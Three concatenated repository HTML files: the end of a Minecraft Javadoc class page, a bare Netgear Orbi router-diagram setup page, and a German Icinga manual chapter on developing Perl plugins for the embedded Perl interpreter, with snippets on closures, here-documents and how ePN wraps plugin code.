</dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityBeaconRenderer.html" title="class in net.minecraft.client.renderer.tileentity"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../../net/minecraft/client/renderer/tileentity/TileEntityEnderChestRenderer.html" title="class in net.minecraft.client.renderer.tileentity"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?net/minecraft/client/renderer/tileentity/TileEntityChestRenderer.html" target="_top">Frames</a></li> <li><a href="TileEntityChestRenderer.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields_inherited_from_class_net.minecraft.client.renderer.tileentity.TileEntitySpecialRenderer">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
git_home/net-cgi.git/www/business_ap_dect/BRS_orbi_router_diagram.html
dan82840/Netgear-RBR50
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no" /> <meta name="title" content="NETGEAR"> <link href="css/orbidesktop.min.css" rel="stylesheet"> <link href="css/styles.css" rel="stylesheet"> <title>NETGEAR Router Orbi </title> </head> <body> <div id="container"> <div class="dialog-content"> <div id="card-no-internet-cable" class="install-card clearfix"> <img class="netgear-logo" src="images/netgear.png"> <div class="bullet-wrapper"> <div class="desc-title" style="margin-top: 60px;"> <img src="images/svg/diagram_router.svg" height="200"> </div> </div> </div> </div> </div> </div> </body> <html>
html/docs/de/epnplugins.html
Icinga/icinga-core
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>11.2. Entwickeln von Plugins für die Nutzung mit Embedded Perl</title> <link rel="stylesheet" href="../stylesheets/icinga-docs.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.75.1"> <meta name="keywords" content="Supervision, Icinga, Nagios, Linux"> <link rel="home" href="index.html" title="Icinga Version 1.14 Dokumentation"> <link rel="up" href="ch11.html" title="Kapitel 11. Entwicklung"> <link rel="prev" href="pluginapi.html" title="11.1. Nagios Plugin API"> <link rel="next" href="icinga-api.html" title="11.3. Keine Icinga API mehr zu installieren"> <script src="../js/jquery-min.js" type="text/javascript"></script><script src="../js/icinga-docs.js" type="text/javascript"></script> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <CENTER><IMG src="../images/logofullsize.png" border="0" alt="Icinga" title="Icinga"></CENTER> <div class="navheader"> <table width="100%" summary="Navigation header"> <tr><th colspan="3" align="center">11.2. Entwickeln von Plugins für die Nutzung mit Embedded Perl</th></tr> <tr> <td width="20%" align="left"> <a accesskey="p" href="pluginapi.html">Zurück</a> </td> <th width="60%" align="center">Kapitel 11. Entwicklung</th> <td width="20%" align="right"> <a accesskey="n" href="icinga-api.html">Weiter</a> </td> </tr> </table> <hr> </div> <div class="section" title="11.2. Entwickeln von Plugins für die Nutzung mit Embedded Perl"> <div class="titlepage"><div><div><h2 class="title" style="clear: both"> <a name="epnplugins"></a>11.2. Entwickeln von Plugins für die Nutzung mit Embedded Perl</h2></div></div></div> <div class="toc"><dl> <dt><span class="section">11.2.1. <a href="epnplugins.html#introduction">Einführung</a></span></dt> <dt><span class="section">11.2.2. <a href="epnplugins.html#targetaudience">Zielgruppe</a></span></dt> <dt><span class="section">11.2.3. <a href="epnplugins.html#todo">Dinge, die Sie tun müssen, um ein Perl-Plugin für ePN zu entwickeln</a></span></dt> </dl></div> <div class="section" title="11.2.1. Einführung"> <div class="titlepage"><div><div><h3 class="title"> <a name="introduction"></a>11.2.1. Einführung</h3></div></div></div> <p>Stanley Hopcroft hat ziemlich viel mit dem eingebetten Perl-Interpreter gearbeitet und die Vor- und Nachteile der Nutzung kommentiert. Er hat auch verschiedene Hinweise gegeben, um Perl-Plugins zu erstellen, die sauber mit dem eingebetteten Interpreter laufen. Der überwiegende Teil dieser Dokumentation stammt aus seinen Kommentaren.</p> <p>Es ist anzumerken, dass sich "ePN", wie in dieser Dokumentation verwendet, auf den eingebetteten Perl-Interpreter, oder wenn Ihnen das lieber ist, auf Icinga kompiliert mit einem eingebetteten Perl-Interpreter bezieht.</p> </div> <div class="section" title="11.2.2. Zielgruppe"> <div class="titlepage"><div><div><h3 class="title"> <a name="targetaudience"></a>11.2.2. Zielgruppe</h3></div></div></div> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>Durchschnittliche Perl-Entwickler mit einem Verständnis für die mächtigen Eigenschaften der Sprache ohne Wissen der Interna bzw. einem vertieften Wissen dieser Eigenschaften.</p> </li> <li class="listitem"> <p>die mit einem benutzenden Wissen statt einem tiefen Verständnis</p> </li> <li class="listitem"> <p>wenn Sie glücklich sind mit Perl-Objekten, sprich Verwaltung, Datenstrukturen und dem Debugger, dann ist das wahrscheinlich ausreichend.</p> </li> </ul></div> <p><span class="bold"><strong>Dinge, die Sie tun sollten, wenn Sie ein Perl-Plugin entwickeln (mit ePN oder ohne)</strong></span></p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>generieren Sie immer etwas Output</p> </li> <li class="listitem"> <p>Verwenden Sie 'use utils' und importieren Sie die Dinge, die es exportiert ($TIMEOUT %ERRORS &amp;print_revision &amp;support)</p> </li> <li class="listitem"> <p>Werfen Sie einen Blick darauf, wie die Standard-Plugins ihren Kram erledigen</p> <div class="itemizedlist"><ul class="itemizedlist" type="circle"> <li class="listitem"> <p>beenden Sie immer mit $ERRORS{CRITICAL}, $ERRORS{OK}, etc.</p> </li> <li class="listitem"> <p>verwenden Sie getopt, um Kommandozeilenparameter einzulesen</p> </li> <li class="listitem"> <p>denken Sie an Timeout-Verwaltung</p> </li> <li class="listitem"> <p>rufen Sie print_usage auf (das Sie liefern müssen), wenn keine Kommandozeilenparameter übergeben wurden</p> </li> <li class="listitem"> <p>benutzen Sie Standard-Optionen (eg H 'host', V 'version')</p> </li> </ul></div> </li> </ul></div> </div> <div class="section" title="11.2.3. Dinge, die Sie tun müssen, um ein Perl-Plugin für ePN zu entwickeln"> <div class="titlepage"><div><div><h3 class="title"> <a name="todo"></a>11.2.3. Dinge, die Sie tun müssen, um ein Perl-Plugin für ePN zu entwickeln</h3></div></div></div> <div class="orderedlist"><ol class="orderedlist" type="1"> <li class="listitem"> <p>&lt;DATA&gt; kann nicht verwendet werden, benutzen Sie statt dessen here-Dokumente, z.B.</p> <pre class="screen">my $data = &lt;&lt;DATA; portmapper 100000 portmap 100000 sunrpc 100000 rpcbind 100000 rstatd 100001 rstat 100001 rup 100001 .. DATA %prognum = map { my($a, $b) = split; ($a, $b) } split(/\n/, $data) ;</pre> </li> <li class="listitem"> <p>BEGIN-Blöcke werden nicht so funktionieren, wie Sie das erwarten. Es wird das Beste sein, wenn Sie darauf verzichten.</p> </li> <li class="listitem"> <p>stellen Sie sicher, dass es während des Compile absolut sauber ist, d.h.</p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>use strict</p> </li> <li class="listitem"> <p>use perl -w (andere Switches [namentlich T] könnten nicht weiterhelfen)</p> </li> <li class="listitem"> <p>use perl -c</p> </li> </ul></div> </li> <li class="listitem"> <p>Vermeiden Sie lexikalische Variablen (my) mit globalem Geltungsbereich, um damit __variable__ Daten in Unterroutinen zu übergeben. Das ist in der Tat __fatal__, wenn die Unterroutine mehrfach aufgerufen wird, während die Prüfung läuft. Solche Unterroutinen arbeiten als 'closures', die den ersten Wert der globalen lexikalischen Variable bei folgenden Aufrufen der Unterroutine beibehalten. Wenn die globale Variable allerdings read-only ist (bei einer komplizierten Struktur zum Beispiel), dann ist das kein Problem. Was Bekman <a class="link" href="http://perl.apache.org/docs/1.0/guide/" target="_top">Ihnen statt dessen rät</a>, ist eines der folgenden Dinge:</p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>machen Sie die Unterroutine anonym und rufen Sie sie z.B. über eine Code-Referenz auf</p> <pre class="screen">ändern Sie dies in my $x = 1 ; my $x = 1 ; sub a { .. Process $x ... } $a_cr = sub { ... Process $x ... } ; . . . . a ; &amp;$a_cr ; $x = 2 $x = 2 ; a ; &amp;$a_cr ; # anonyme Closures binden __immer__ den aktuellen lexikalischen Wert ein</pre> </li> <li class="listitem"> <p>packen Sie globale Lexikale und die Unterroutine, die sie benutzt, in ihr eigenes Package (als ein Objekt oder Modul)</p> </li> <li class="listitem"> <p>übergeben Sie Informationen an Unterroutinen als Referenzen oder Aliases (\$lex_var oder $_[n])</p> </li> <li class="listitem"> <p>ersetzen Sie Lexikale durch Package Globals und schließen Sie diese von 'use strict'-Beanstandungen durch 'use vars qw(global1 global2 ..)' aus</p> </li> </ul></div> </li> <li class="listitem"> <p>Seien Sie sich bewusst, woher Sie mehr Informationen bekommen können.</p> <p>Nützliche Informationen können Sie von den üblichen Verdächtigen bekommen (die O'Reilly-B�cher, plus Damien Conways "Object Oriented Perl"), aber um den wirklich nützlichen Kram im richtigen Kontext zu bekommen, starten Sie mit Stas Bekman's mod_perl guide unter <a class="link" href="http://perl.apache.org/guide/" target="_top">http://perl.apache.org/guide/</a>.</p> <p>Dieses wundervolle Dokument in Buchgröße hat überhaupt nichts mit Icinga zu tun, aber dafür umso mehr mit dem Schreiben von Perl-Programmen für den eingebetteten Perl-Interpreter in Apache (d.h. Doug MacEacherns mod_perl).</p> <p>Die perlembed-Manpage ist wichtig für den Zusammenhang und die Ermunterung..</p> <p>Auf der Basis, dass Lincoln Stein und Doug MacEachern ein oder zwei Dinge über Perl und eingebettetes Perl wissen, ist ihr Buch 'Writing Apache Modules with Perl and C' ziemlich sicher einen Blick wert.</p> </li> <li class="listitem"> <p>Achten Sie darauf, dass Ihr Plugin mit ePN vielleicht merkwürdige Werte zurückliefert und dass das wahrscheinlich an dem unter Punkt 4 angesprochenen Problem liegt</p> </li> <li class="listitem"> <p>Seien Sie darauf vorbereitet, dass Sie debuggen über:</p> <div class="itemizedlist"><ul class="itemizedlist" type="disc"> <li class="listitem"> <p>ein Test-ePN und</p> </li> <li class="listitem"> <p>print-Befehle in Ihr Plugin einfügen, um Variablenwerte auf STDERR auszugeben (da Sie STDOUT nicht verwenden können)</p> </li> <li class="listitem"> <p>print-Befehle in p1.pl einfügen, um anzuzeigen, was ePN glaubt, was Ihr Plugin ist, bevor es versucht, das auszuführen (vi)</p> </li> <li class="listitem"> <p>ePN im Vordergrund-Modus auszuführen (möglicherweise in Verbindung mit den obigen Empfehlungen)</p> </li> <li class="listitem"> <p>das 'Deparse#-Modul in Ihrem Modul zu benutzen, um zu sehen, wie der Parser es optimiert hat und was der Interpreter wirklich bekommt (lesen Sie 'Constants in Perl' von Sean M. Burke, The Perl Journal, Fall 2001)</p> </li> </ul></div> <pre class="screen"> perl -MO::Deparse &lt;your_program&gt;</pre> </li> <li class="listitem"> <p>Beachten Sie, in was ePN Ihr Plugin transformiert, und falls alles andere fehlschlägt, debuggen Sie die transformierte Version.</p> <p>Wie Sie unten sehen können, schreibt p1.pl Ihr Plugin um in eine Unterroutine namens 'hndlr' im Package 'Embed::&lt;something_related_to_your_plugin_file_name&gt;'.</p> <p>Ihr Plugin wird ggf. Kommandozeilenparameter in @ARGV erwarten, so dass p1.pl auch @_ an @ARGV zuweist.</p> <p>Dies wiederum wird 'eval'-t und falls dieser Test mit einem Fehler fehlschlägt (jeder Parse- oder Laufzeitfehler), wird das Plugin 'rausgeschmissen'.</p> <p>Die folgenden Ausgaben zeigen, wie ein Test-ePN das <span class="emphasis"><em>check_rpc</em></span>-Plugin transformiert hat, bevor es versucht, es auszuführen. Der meiste Code des eigentlichen Plugins wird nicht gezeigt, weil wir nur an den Umformungen interessiert sind, die der ePN am Plugin vorgenommen hat). Zur Verdeutlichung sind die Umformungen in rot dargestellt:</p> <pre class="screen"> package main; use subs 'CORE::GLOBAL::exit'; sub CORE::GLOBAL::exit { die "ExitTrap: $_[0] (Embed::check_5frpc)"; } package Embed::check_5frpc; sub hndlr { shift(@_); @ARGV=@_; #! /usr/bin/perl -w # # check_rpc plugin for Icinga # # usage: # check_rpc host service # # Check if an rpc service is registered and running # using rpcinfo - $proto $host $prognum 2&gt;&amp;1 |"; # # Use these hosts.cfg entries as examples # # command[check_nfs]=/some/path/libexec/check_rpc $HOSTADDRESS$ nfs # service[check_nfs]=NFS;24x7;3;5;5;unix-admin;60;24x7;1;1;1;;check_rpc # # initial version: 3 May 2000 by Truongchinh Nguyen and Karl DeBisschop # current status: $Revision: 1.18 $ # # Copyright Notice: GPL # <span class="emphasis"><em> ... der Rest des Plugin-Codes folgt (und wurde aus Gründen der Kürze entfernt) ...</em></span> }</pre> </li> <li class="listitem"> <p>Nutzen Sie 'use diagnostics' nicht in einem produktiven ePN. Wir glauben, es sorgt dafür, dass __alle__ Perl-Plugins CRITICAL zurückliefern.</p> </li> <li class="listitem"> <p>Überlegen Sie, ob Sie ein Mini-ePN benutzen, um Ihr Plugin zu testen. Das ist nicht ausreichend, um zu garantieren, dass Ihr Plugin mit einem ePN fehlerfrei ausgeführt wird, aber wenn bereits der Plugin-Test fehlschlägt, dann wird er auf jeden Fall mit Ihrem ePN fehlschlagen. <span class="color"><font color="red">[ Ein Beispiel-Mini-ePN ist im <span class="emphasis"><em>contrib/</em></span>-Verzeichnis der Icinga-Distribution zu finden. Wechseln Sie in das contrib/-Verzeichnis und tippen Sie 'make mini_epn', um es zu kompilieren. Es muss im gleichen Verzeichnis ausgeführt werden, in dem die p1.pl-Datei steht (diese Datei wird mit Icinga ausgeliefert). ]</font></span></p> </li> </ol></div> <a class="indexterm" name="idm139734663376608"></a> </div> </div> <div class="navfooter"> <hr> <table width="100%" summary="Navigation footer"> <tr> <td width="40%" align="left"> <a accesskey="p" href="pluginapi.html">Zurück</a> </td> <td width="20%" align="center"><a accesskey="u" href="ch11.html">Nach oben</a></td> <td width="40%" align="right"> <a accesskey="n" href="icinga-api.html">Weiter</a> </td> </tr> <tr> <td width="40%" align="left" valign="top">11.1. Nagios Plugin API </td> <td width="20%" align="center"><a accesskey="h" href="index.html">Zum Anfang</a></td> <td width="40%" align="right" valign="top"> 11.3. Keine Icinga API mehr zu installieren</td> </tr> </table> </div> <P class="copyright">© 1999-2009 Ethan Galstad, 2009-2017 Icinga Development Team, https://www.icinga.com</P> </body> </html>